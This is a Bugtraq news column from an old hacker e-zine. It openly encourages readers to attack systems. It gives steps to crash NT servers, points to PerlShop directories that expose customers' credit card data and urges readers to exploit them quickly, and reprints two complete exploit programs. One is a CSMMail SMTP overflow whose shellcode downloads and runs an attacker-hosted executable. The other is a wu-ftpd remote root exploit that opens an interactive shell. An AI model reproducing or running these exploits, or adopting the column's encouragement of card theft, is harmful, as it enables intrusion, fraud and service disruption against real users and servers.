-->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[::::[ SUIDcyde ]:::::::[OO--[ by Bodie ]----------[ bodi3@usa.net ]--- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Welcome to the new regular hacking section in faith, this section is devoted to the latest news, techniches and exploits in hacking. Enjoy ---------- Bugtraq watch As a regular colum now in faith i'll be telling everyone what is going on in the worlds greatest mailing list - bugtraq, it's where all the latest exploits get posted to and it's the best list for security. Recently there have been several bugs reported. Possibly the most severe one was a report of being able to remotly reboot an NT machine. This is how to do it: find an NT box running SP4 (service pack 4) Telnet to port 1723 type 256 'h' charictors and hit return Press ^D This hopefully should cause the machine to completely reboot and cause microshaft a few more headaches which is always good news for our favorite linux servers :). This bug hasn't been confirmed yet and some people haven't been able to get it to work, but give it a go anyway Possibly the most serious flaw uncovered recently was an exploit in some online shopping services, some of these are run on a software package called perlshop. With this you can get peoples credit card info which is always nice :) For this one all you have to do is find a site running the software (it may tell you that it is on the web page) and go to the directory: www.vulnerable.com/store/customers/ or it may be in: www.vulnerable.com/store/temp_customers/ This bug is likely to be fixed extreemly quickly so if ya wanna exploit it, ya better hurry up :) There has also been reported buffer overflows in the windows CSMMail SMTP server. Time for some exploit code: <--------------------------CUT HERE-------------------------> #define UNIX #ifndef UNIX #include #include #include #include #define CLOSE _close #define SLEEP Sleep #else #include #include #include #include #include #include #include #define CLOSE close #define SLEEP sleep #endif /* CSMMail Exploit by _mcp_ Win32 port and sp3 address's by Acpizer Greets go out to the following people: Morpheus, Sizban, Rocket, Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite and #win32asm. You can contact me by e-mail or on efnet. As always no greets go out to etl */ const unsigned long FIXUP1 = 264; const unsigned long FIXUP2 = 268; const unsigned long OFFSET = 260; char code[] = "\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB" "\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46" "\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3" "\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66" "\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33" "\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51" "\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6" "\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF" "\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57" "\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1" "\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66" "\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D" "\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46" "\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F" "\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66" "\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53" "\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30" "\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } #ifndef UNIX memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length); #else bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); #endif return(binip); } int usages(char *fname) { printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ .\n"); printf("Win32 porting and nt sp3 address's by Acpizer \n"); printf("Usages: \n"); printf("%s \n", fname); printf("win98 SP1:\n"); printf(" = 0xBFF78030\n"); printf(" = 0xBFF79243\n"); printf("NT SP3:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E53FC7\n"); printf("NT SP4:\n"); printf(" = 0x77EB14C0\n"); printf(" = 0x77E9A3A4\n"); printf("Will make running CSMMail download, save, and\n"); printf("execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,targethost,sinlen; struct sockaddr_in sin; static unsigned char buffer[20000]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long rw_mem; #ifndef UNIX WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if (err != 0) exit(1); #endif if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0) { printf("Input Error, the fixup memory address has incorrect format\n"); exit(0); } if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0) { printf("Input error, the return address has incorrect format\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"VRFY "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr2=ptr; ptr2+=FIXUP1; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr2=ptr; ptr2+=FIXUP2; memcpy((void *) ptr2,(void *) &rw_mem,4); ptr+=OFFSET; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); #ifndef UNIX send(sock, "HELO lamer.com\r\n",16, 0); send(sock, (char *)&buffer, strlen((char *)&buffer), 0); send(sock,"\r\n",2,0); #else write(sock, "HELO lamer.com\r\n",16); write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char*)&buffer */ write(sock,"\r\n",2); #endif SLEEP(1); printf("Sent the egg\n"); #ifndef UNIX WSACleanup(); #endif CLOSE(sock); exit(1); } <--------------------------CUT HERE-------------------------> Also there has been another buffer overflow found in wu-ftpd, a popular ftp deamon for unix servers. This only exists in beta versions 12 - 18, and these aren't the current version, so don't be supprised if you find that not too many servers are running it. <--------------------------CUT HERE-------------------------> /* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include #include #include #include #include #include #include #include #include #include #include /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. */ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. (the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 0xb2ffe356, 3,-28, 1, "BETA-15 (redhat 5.0)", }, { 0xbfffebc5, 3, 0, 1, "BETA-15 (slackware 3.3)", }, { 0xbffff3b3, 3, 0, 1, "BETA-15 (slackware 3.4)", }, { 0xbffff395, 3, 0, 1, "BETA-15 (slackware 3.6)", }, { 0,0,0,0,NULL } }; struct options { char start_dir[20]; unsigned char *shellcode; unsigned char chroot; char username[10]; char password[10]; int offset; int t; } opts; /* Bit of a big messy function, but hey, its only an exploit */ int main(int argc,char **argv) { char *argv0,ltr; char outbuf[1024], inbuf[1024], ret_string[5]; int pwdlen,ctr,d; FILE *cin; int fd; struct in_addr victim; argv0 = strdup(argv[0]); *opts.username = *opts.password = *opts.start_dir = 0; opts.chroot = opts.offset = opts.t = 0; opts.shellcode = hellcode_a; while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){ switch (d) { case 'c': opts.shellcode = hellcode_b; opts.chroot = 1; break; case 's': strcpy(opts.start_dir,optarg); break; case 'o': opts.offset = atoi(optarg); break; case 't': opts.t = atoi(optarg); if ((opts.t < 0)||(opts.t>5)) { printf("Dont have that type!\n"); exit(-1); } } } argc -= optind; argv += optind; if (argc < 3) usage(argv0); if (!resolv(argv[0],&victim)) { perror("resolving"); exit(-1); } strcpy(opts.username,argv[1]); strcpy(opts.password,argv[2]); if ((fd = tcp_connect(victim,21)) < 0) { perror("connect"); exit(-1); } if (!(cin = fdopen(fd,"r"))) { printf("Couldn't get stream\n"); exit(-1); } Fgets(inbuf,sizeof(inbuf),cin); printf("%s",inbuf); if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0) fatal("Bad username\n"); if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0) fatal("Bad password\n"); if (*opts.start_dir) if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0) fatal("Couldn't change dir\n"); if (ftp_command(inbuf,257,cin,"PWD\n")<0) fatal("PWD\n"); if (parse_pwd(inbuf,&pwdlen) < 0) fatal("PWD\n"); srand(time(NULL)); printf("Making padding directorys\n"); for (ctr = 0;ctr < 4;ctr++) { ltr = rand()%26 + 65; memset(outbuf,ltr,194); outbuf[194]=0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); } /* Make padding directory */ ctr = 124 - (pwdlen - types[opts.t].align);//180 //ctr = 152 - (pwdlen - types[opts.t].align); ctr -= types[opts.t].pad_shift; if (ctr < 0) { exit(-1); } memset(outbuf,'A',ctr+1); outbuf[ctr] = 0; if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0) fatal("CWD\n"); memset(outbuf,0x90,195); d=0; for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++) outbuf[ctr] = opts.shellcode[d++]; double_up(types[opts.t].ret_address-opts.offset,ret_string); strcpy(outbuf+RET_POS,ret_string); strcpy(outbuf+RET_POS+strlen(ret_string),ret_string); printf("Press any key to send shellcode...\n"); getchar(); if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0) fatal("MKD\n"); if (types[opts.t].overflow_type == 1) if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0) fatal("DELE\n"); /* HEH. For type 1 style we add a dele command. This overflow occurs in delete() in ftpd.c. The cause is realpath() in realpath.c not checking bounds correctly, overwriting path[] in delete(). */ RunShell(fd); return(1); } void RunShell(int thesock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(thesock,&rset); FD_SET(STDIN_FILENO,&rset); select(thesock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(thesock,&rset)) { n=read(thesock,recvbuf,1024); if (n <= 0) { printf("Connection closed\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { n=read(STDIN_FILENO,recvbuf,1024); if (n>0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } return; } int double_up(unsigned long blah, char *doh) { int a; unsigned char *ptr,*ptr2; bzero(doh,6); ptr=doh; ptr2=(char *)&blah; for (a=0;a<4;a++) { *ptr++=*ptr2; if (*ptr2==0xff) *ptr++=0xff; ptr2++; } return(1); } int parse_pwd(char *in, int *pwdlen) { char *ptr1,*ptr2; /* 257 "/" is current directory */ ptr1 = strchr(in,'\"'); if (!ptr1) return(-1); ptr2 = strchr(ptr1+1,'\"'); if (!ptr2) return(-1); *ptr2 = 0; *pwdlen = strlen(ptr1+1); /* If its just "/" then it contributes nothing to the RET_POS */ if (*pwdlen==1) *pwdlen -= 1; printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen); return(1); } int tcp_connect(struct in_addr host,unsigned short port) { struct sockaddr_in serv; int fd; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&host,sizeof(struct in_addr)); serv.sin_port = htons(port); serv.sin_family = AF_INET; if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) { return(-1); } return(fd); } int ftp_command(char *buf,int success,FILE *out,char *fmt,...) { va_list va; char line[1200]; int val; va_start(va,fmt); vsprintf(line,fmt,va); va_end(va); if (write(fileno(out),line,strlen(line)) < 0) return(-1); bzero(buf,200); while(1) { Fgets(line,sizeof(line),out); #ifdef DEBUG printf("%s",line); #endif if (*(line+3)!='-') break; } strncpy(buf,line,200); val = atoi(line); if (success != val) return(-1); return(1); } void fatal(char *string) { printf("%s",string); exit(-1); } char *Fgets(char *s,int size,FILE *stream) { char *ptr; ptr = fgets(s,size,stream); //if (!ptr) //fatal("Disconnected\n"); return(ptr); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); } int usage(char *program) { fprintf(stderr,"Usage: %s [-c] [-s start_dir]\n",program); fprintf(stderr,"\t[-o offset] [-t type]\n"); fprintf(stderr,"types:\n"); fprintf(stderr,"0 - %s\n", types[0].name); fprintf(stderr,"1 - %s\n", types[1].name); fprintf(stderr,"2 - %s\n", types[2].name); fprintf(stderr,"3 - %s\n", types[3].name); fprintf(stderr,"4 - %s\n", types[4].name); fprintf(stderr,"5 - %s\n", types[5].name); fprintf(stderr,"\n"); exit(0); } <--------------------------CUT HERE-------------------------> Thats about all for the moment. If you want to subscribe to bugtraq yourself, send a mail to bugtraq@netspace.org with the text subscribe bugtraq in the body of the message Bodie ----------